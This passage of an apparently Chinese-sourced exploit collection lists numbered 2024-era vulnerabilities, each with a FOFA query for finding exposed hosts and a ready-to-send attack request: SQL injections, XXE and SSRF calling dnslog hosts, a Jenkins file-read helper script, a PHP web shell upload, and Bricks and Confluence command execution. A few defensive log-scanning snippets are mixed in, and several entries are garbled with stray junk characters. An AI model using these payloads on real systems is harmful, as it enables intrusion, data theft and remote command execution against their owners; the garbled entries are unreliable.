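def decode_saml_request(value: str) -> bytes:
    """Decode a SAMLRequest parameter value to XML bytes.

    POST binding: base64 of the XML.  Redirect binding: base64 of raw DEFLATE,
    so when the decoded bytes are not XML already, try inflating them.
    """
    raw = base64.b64decode(value + "=" * (-len(value) % 4))
    if raw.lstrip().startswith(b"<"):
        return raw
    try:
        return zlib.decompress(raw, -15)
    except zlib.error:
        return raw


def is_xxe_attempt(saml_request: str) -> bool:
    """True when the decoded request contains a DOCTYPE with an external entity."""
    try:
        xml = decode_saml_request(saml_request)
    except (ValueError, UnicodeError):
        return False  # not base64 at all; leave that to a different check
    return bool(_DOCTYPE.search(xml) and _EXTERNAL_ENTITY.search(xml))


def encode_redirect_binding(xml: bytes) -> str:
    """Build a redirect-binding value (raw DEFLATE + base64) for offline testing."""
    compressor = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(compressor.compress(xml) + compressor.flush()).decode()


# SAMLRequest value from the PoC above (POST binding).
POC_SAML_REQUEST = (
    "PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0K"
    "ICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg=="
)

# Constructed benign AuthnRequest, used for contrast.
BENIGN_XML = (
    b'<?xml version="1.0"?><samlp:AuthnRequest '
    b'xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_1" Version="2.0"/>'
)

if __name__ == "__main__":
    print("PoC request flagged:", is_xxe_attempt(POC_SAML_REQUEST))
    print("benign POST binding flagged:", is_xxe_attempt(base64.b64encode(BENIGN_XML).decode()))
    print("benign redirect binding flagged:", is_xxe_attempt(encode_redirect_binding(BENIGN_XML)))
```

Run it over the SAMLRequest values in your access or WAF logs; a hit on the DOCTYPE/ENTITY pair in a SAML message is never legitimate traffic.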


104. TOTOLINK T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-Type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

Open the download side of the same session to read the output:
POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response excerpt:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
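
An added example, not code from the original list or from Jenkins: it encodes the CLI arguments into the framing used by the byte string above (4-byte big-endian length, 1-byte op code, then a Java writeUTF string with a 2-byte length prefix) and parses frames coming back on the download side. The op codes 0 to 3 (ARG, LOCALE, ENCODING, START) are confirmed by the PoC bytes; EXIT, STDOUT and STDERR are taken from the Jenkins PlainCLIProtocol enum ordering and are an assumption here. SAMPLE_RESPONSE is constructed with the same frame() helper, so nothing in this block talks to a server.

```python
import struct

# Op codes of the Jenkins plain CLI protocol. 0-3 are visible in the PoC bytes;
# the rest follow the PlainCLIProtocol.Op enum order (assumption, see lead-in).
OP_ARG, OP_LOCALE, OP_ENCODING, OP_START = 0, 1, 2, 3
OP_EXIT, OP_STDIN, OP_END_STDIN, OP_STDOUT, OP_STDERR = 4, 5, 6, 7, 8


def frame(op: int, payload: bytes) -> bytes:
    """One frame: 4-byte big-endian payload length, 1-byte op, payload."""
    return struct.pack(">I", len(payload)) + bytes([op]) + payload


def java_utf(text: str) -> bytes:
    """Java DataOutputStream.writeUTF(): 2-byte big-endian length, then UTF-8."""
    data = text.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def cli_request(args, encoding: str = "GBK", locale: str = "en_US") -> bytes:
    """Upload-side body for a CLI call, one ARG frame per argument.

    An argument of the form '@/path' is expanded by the args4j-based parser into
    the file's contents, which is what CVE-2024-23897 abuses.
    """
    body = b"".join(frame(OP_ARG, java_utf(a)) for a in args)
    body += frame(OP_ENCODING, java_utf(encoding))
    body += frame(OP_LOCALE, java_utf(locale))
    body += frame(OP_START, b"")
    return body


def parse_frames(data: bytes):
    """Split a download-side byte stream into (op, payload) tuples."""
    frames, pos = [], 0
    while pos + 5 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        op = data[pos + 4]
        payload = data[pos + 5:pos + 5 + length]
        if len(payload) != length:
            break  # truncated stream: stop rather than mis-parse
        frames.append((op, payload))
        pos += 5 + length
    return frames


def leaked_text(data: bytes) -> str:
    """Concatenate STDOUT/STDERR payloads, where the expanded file contents appear."""
    chunks = [p for op, p in parse_frames(data) if op in (OP_STDOUT, OP_STDERR)]
    return b"".join(chunks).decode("utf-8", "replace")


# Constructed download-side response, modelled on the error shown above.
SAMPLE_RESPONSE = (
    frame(OP_STDERR, b"ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n")
    + frame(OP_EXIT, struct.pack(">I", 2))
)

if __name__ == "__main__":
    print(cli_request(["help", "@/etc/passwd"]))
    print(leaked_text(SAMPLE_RESPONSE))
```

`cli_request(["help", "@/etc/passwd"])` reproduces the PoC body byte for byte; swapping the command or the file path is then a one-argument change, and `leaked_text` is what to run over the download-side body to pull the file lines out of the error and help text.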


110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS插件 SQL注入: O8 F# I: \; z2 X' Y
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
8 U8 t4 ?3 X, l0 eGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
( A* }8 s. [9 yHost: your-ip
2 \& Y" S0 `( q" \5 uUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
2 u! ^, j( J. Q! @: h2 R- o3 |% OAccept-Charset: utf-8
. C# ]0 c( }1 H% ?Accept-Encoding: gzip, deflate! R8 P/ P  k$ K& Y; m
Connection: close
0 a8 C. {  }2 ~- E1 ?" W1 |4 p
  T! n' z/ `/ S9 V5 t4 a
* L6 _: [. F6 i* C7 e3 g115. WordPress Bricks Builder <= 1.9.6 RCE
! O: E0 X) x# VCVE-2024-25600
) L) U) w( J+ O( O( z; YFOFA: body="/wp-content/themes/bricks/"
7 r! {% \& U3 n# G第一步,获取网站的nonce值. R, d$ y; N1 o& F9 c, u- A
GET / HTTP/1.1
* H/ m( g9 p/ c: [Host: x.x.x.x
- u0 S5 ?4 E. }$ r2 FUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36+ G9 Y$ {/ w% ]3 [1 m2 }- B% ^  A. s) C
Connection: close( V6 V7 D* D; T4 q  x' ^
Accept-Encoding: gzip
: {' v4 D2 E& q; g, Z
7 s: g) @0 q* b# `
7 Y3 M  d/ s" n  N' I. w: y: c9 E第二步替换nonce值,执行命令
2 O0 G) h9 Q/ v1 B  T4 KPOST /wp-json/bricks/v1/render_element HTTP/1.1' [& `: t* E0 _# o% F2 z' K1 U
Host: x.x.x.x
0 g( \9 ?) y+ g0 ]. ?( {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36+ j! Q3 B- c6 g" E
Connection: close% m9 B7 y+ i5 |$ Z: q
Content-Length: 356# f! a5 ^7 D  i  V$ l( S
Content-Type: application/json7 v* b. M4 S% B' d, Z1 a) R
Accept-Encoding: gzip
, V; x+ L( x2 Q6 {) ]. n  T9 X3 d+ C. w9 ~0 x
{
6 }+ v4 _$ C4 d& G"postId": "1",
9 z: z7 d( h7 ^, y2 g% v) m  "nonce": "第一步获得的值",
6 C! B; I, Y! K+ e  "element": {
% S: i$ r9 n( ]8 S    "name": "container",; d' ?8 C  K' L7 F3 Z. n' [" T8 Y
    "settings": {
  f. [/ q4 k& Q5 e( ?      "hasLoop": "true",# ]" o1 z' ^, I  X# \, K% H( \
      "query": {
4 B( }2 p) B2 f        "useQueryEditor": true,; D6 u  D5 ?$ L7 h/ N7 R. @& T. b2 k
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
; x. z7 u6 i( b% ]3 N* v        "objectType": "post"
' C. o8 o$ t2 z% ~# ?2 s/ c      }- _6 l5 h# r; V1 {/ ]0 n. F
    }, e! V& y" C( Q) _: k' j+ F
  }
0 R$ f) q6 J- [1 H, a) r; ^}
: a0 B, d7 I0 w$ }3 E1 g6 Z
$ Q7 q* b% h! z% Y6 q! B
116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


1 K* Q3 s; z* E7 f117. WordPress LayerSlider插件SQL注入
2 i2 Z" G% x# wversion:7.9.11 – 7.10.0, ]2 t" F0 u+ I9 }( f" h
FOFA:body="/wp-content/plugins/LayerSlider/"
. g2 ~4 L3 I; H+ g! _; Z: T- eGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1% Y  @' D/ b' w9 b5 v
Host: your-ip9 L9 M7 Y. }3 j2 R% k0 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.00 R* c- ~" q+ Z' H! I* X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: D5 d1 Y9 @4 G; JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 w. j" D, h/ r' Z/ d9 PAccept-Encoding: gzip, deflate, br
0 y2 X) J! j' H# d. \% j: h5 yConnection: close
+ d% }9 H! v7 W% _% \Upgrade-Insecure-Requests: 18 L$ N4 I* X) U" L# a
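
An added example for defenders, not part of the original list: it normalises request URIs taken from web access-log lines (URL-decoding "+" and %28-style encoding, lowercasing, collapsing whitespace) and flags the delay-based and error-based SQL probes used in entries 106, 111, 114 and 117 above. The same `sqli_indicators` function applied to a request body also catches the probes in entries 112 and 119, where a WAF or application log records bodies. The log lines are constructed; the request paths in them are the ones from those entries, and the IPs, timestamps and sizes are made up.

```python
import re
from urllib.parse import unquote_plus

# Probe patterns from the entries above, matched against a normalised request.
_PATTERNS = [
    re.compile(r"\bsleep\s*\(\s*\d+"),               # MySQL SLEEP(n): time-based probes
    re.compile(r"\bbenchmark\s*\(\s*\d+"),           # MySQL BENCHMARK(n, expr)
    re.compile(r"\bupdatexml\s*\(.*\bconcat\s*\("),  # error-based (SpringBlade entries)
    re.compile(r"\bextractvalue\s*\(.*\bconcat\s*\("),
    re.compile(r"\bpg_sleep\s*\("),                  # PostgreSQL
    re.compile(r"\bwaitfor\s+delay\b"),              # MSSQL
]

# Combined/common log format; the request line is split into method and URI.
_LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)'
)


def normalise(text: str) -> str:
    """URL-decode twice (double-encoded probes), lowercase, squash whitespace."""
    decoded = unquote_plus(unquote_plus(text))
    return re.sub(r"\s+", " ", decoded.lower())


def sqli_indicators(text: str) -> list:
    """Return the probe patterns matched in a URI, query string or body."""
    norm = normalise(text)
    return [p.pattern for p in _PATTERNS if p.search(norm)]


def scan_access_log(lines):
    """Return (ip, uri, matched patterns) for each log line carrying a probe."""
    hits = []
    for line in lines:
        m = _LOG_LINE.match(line)
        if not m:
            continue
        found = sqli_indicators(m["uri"])
        if found:
            hits.append((m["ip"], m["uri"], found))
    return hits


# Constructed log lines; paths are those of entries 106, 111, 114 and 117 plus one benign request.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Mar/2024:10:00:01 +0000] "GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" 500 312',
    '10.0.0.5 - - [01/Mar/2024:10:00:02 +0000] "GET /?rest_route=/h5vp/v1/view/1&id=1\'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 200 88',
    '10.0.0.5 - - [01/Mar/2024:10:00:03 +0000] "GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1" 200 88',
    '10.0.0.5 - - [01/Mar/2024:10:00:04 +0000] "GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1" 200 88',
    '10.0.0.9 - - [01/Mar/2024:10:00:05 +0000] "GET /?rest_route=/h5vp/v1/view/1&id=1 HTTP/1.1" 200 1204',
]

if __name__ == "__main__":
    for ip, uri, found in scan_access_log(SAMPLE_LOG):
        print(ip, uri, found)
```

Pair a hit with the response time of the same request: a time-based probe that took about as long as its SLEEP argument means the injection worked, not just that it was attempted.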


118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://x.x.x.x:8443
Referer: https://x.x.x.x:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


The uploaded file is at /upload/2.php

121. Byzoro (北京百绰智能) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

Uploaded file path: boot/web/upload/weblogo/1.php

122. Byzoro (北京百绰智能) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter is the base64 encoding (not encryption) of the statement to run: c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= decodes to select 1,database(),version().
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close


123. Atlassian Confluence template injection code execution
CVE-2023-22527
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
The label parameter of text-inline.vm is evaluated as OGNL; the injected expression runs id and writes its output to the X-Cmd-Response response header.
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))


124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>


Written file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc


Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!


Once the user has been created, log in to the admin console with it; system commands can be run from there.

126. aiohttp path traversal
CVE-2024-23334
FOFA:title=="ComfyUI"
Affects aiohttp before 3.9.2 when a static route is registered with follow_symlinks=True; the ../ segments are then followed out of the served directory.
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
The Params part is parsed as XML with external entities enabled; the SYSTEM entity makes the server resolve the DNS log host.
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--


128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: ColdFusion 2018 Update 17 and earlier, 2021 Update 7 and earlier, 2023 Update 1 and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
